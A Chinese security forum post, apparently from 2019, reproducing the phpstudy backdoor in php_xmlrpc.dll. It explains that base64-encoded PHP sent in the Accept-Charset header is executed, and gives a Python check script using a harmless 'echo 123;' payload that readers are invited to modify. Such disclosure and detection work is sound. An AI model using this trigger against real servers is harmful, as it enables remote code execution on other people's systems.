用户
搜索
  • TA的每日心情
    擦汗
    昨天 21:37
  • 签到天数: 146 天

    连续签到: 6 天

    [LV.7]常住居民III

    实习版主

    Rank: 7Rank: 7Rank: 7

    10

    主题

    160

    帖子

    558

    魔法币
    收听
    0
    粉丝
    5
    注册时间
    2017-7-18

    积极活跃奖核心白帽

    发表于 2019-9-24 18:46:17 64675
    0x01:最近又出了一个大动静,我们常用的phpstudy竟然存在后门?
    春秋1.png
    0x02:晚上团队表哥们突然炸了锅似的。。都在研究。。于是自己也跟着表哥们思路复现了一下
    利用条件(后门存在)
    php\php-5.4.45\ext\php_xmlrpc.dll”文件和“\php\php-5.2.17\ext\php_xmlrpc.dll”文件中

    如下图 发现可疑处 evel函数这 可利用该方法检测一下
    cq2.png
    通过http头 Accept-Charset 传入参数RCE(base64)即可
    如图(中招了。。):
    cq3.png
    0x03: 用python写了很简单的小脚本
    import requests
    headers = {
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
    'Accept-Charset': 'ZWNobyAxMjM7',
    'Accept-Encoding': 'gzip,deflate'
    }
    url =
    input('请输入URL:')
    res = requests.get(
    url=url,headers=headers)
    if res.text in "123":
       
    print('存在漏洞')
    else:
       
    print('没有漏洞')
    base64加密的为 echo 123;
    后续大佬们可以自己改一下。。
    注: Accept-Charset: 参数  参数前面要有空格。。
    cq4.png
    路漫漫,
    使用道具 举报 回复
    使用道具 举报 回复
    发表于 2019-9-27 09:19:05
    感谢分享
    使用道具 举报 回复
    发表于 2019-9-29 18:08:15
    使用道具 举报 回复
    发表于 2019-10-10 19:06:11
    怎么没人点赞啊啊
    使用道具 举报 回复
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册